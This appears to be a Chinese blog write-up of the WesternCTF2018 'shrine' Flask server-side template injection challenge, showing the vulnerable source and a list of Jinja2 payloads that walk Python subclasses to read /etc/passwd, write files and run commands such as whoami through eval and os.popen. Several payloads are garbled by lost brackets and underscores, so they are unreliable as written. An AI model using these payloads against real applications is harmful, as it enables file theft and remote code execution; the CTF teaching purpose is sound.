flask之ssti [WesternCTF2018]shrine1

打开题目

整理一下,代码:

复制代码
import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')

def index():
    return open(__file__).read()
           @app.route('/shrine/')

def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
    app.run(debug=True)

知识点:

1.ssti的漏洞实质

实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题

2.flask的一些特性

flask有两种渲染方式,render_template() 和 render_template_string()。

render_template()是渲染文件的,render_template_string是渲染字符串的

使用{ { }}作为变量包裹标识符;

快速查找该引用对应的位置:

''.class.mro2.subclasses().index(file)
文件读写:

''.class.mro2.subclasses()40

//读取文件

''.class.mro2.subclasses()59.init.globals'__builtins__''file'("/etc/passwd").read()

''.class.mro2.subclasses()40("/etc/passwd").read()

将read()改为write()就可以进行写操作:

''.class.mro2.subclasses()40("/root/桌面/test.txt", "a").write("123")

复制代码

命令执行

1.利用eval进行命令执行

''.class.mro2.subclasses()59.init.globals'__builtins__''eval'('import("os").popen("whoami").read()')

2.利用commands实现命令执行

\[\].class.base.subclasses()59.init.globals'linecache'.dict.values()12.dict.values()144('whoami')}

{}.class.bases0.subclasses()59.init.globals'__builtins__''__import__'('os').popen('whoami').read()

直接将这些payload放入{ {}}中作为变量执行即可获得想要的结果

知识点参考文章:

关于flask的SSTI注入通俗易懂-腾讯云开发者社区-腾讯云

flask模板注入(ssti),一篇就够了_flask"+"ssti"+"总结-CSDN博客

相关推荐
Chenyiax16 分钟前
从 Chat 到 Responses:OpenAI API 抽象为什么变了?
后端
MariaH17 分钟前
Koa和Express的区别
后端
MariaH22 分钟前
Koa框架的使用
后端
星云穿梭1 小时前
用Python写一个带图形界面的学生管理系统——完整教程
python
luckdewei1 小时前
那个用 passlib 做认证的新同事,上线第一天就把用户密码写进了日志
后端
金銀銅鐵2 小时前
用 Pygame 实现 15 puzzle
python·数学·游戏
ping某3 小时前
为什么 Nginx 明明监听了 80,转发后端时却用了 4xxxx 端口?
后端·nginx
JustHappy3 小时前
我汇总了身边朋友的经历才发现,其实第一份实习是最难找的......
前端·后端·面试
uhakadotcom3 小时前
在python 的 工程化架构中 ,什么是 薄包装器层?
后端·面试·github
用户1474853079747 小时前
CodeX使用Skill生成游戏美术和音乐资源,一分钟入门
后端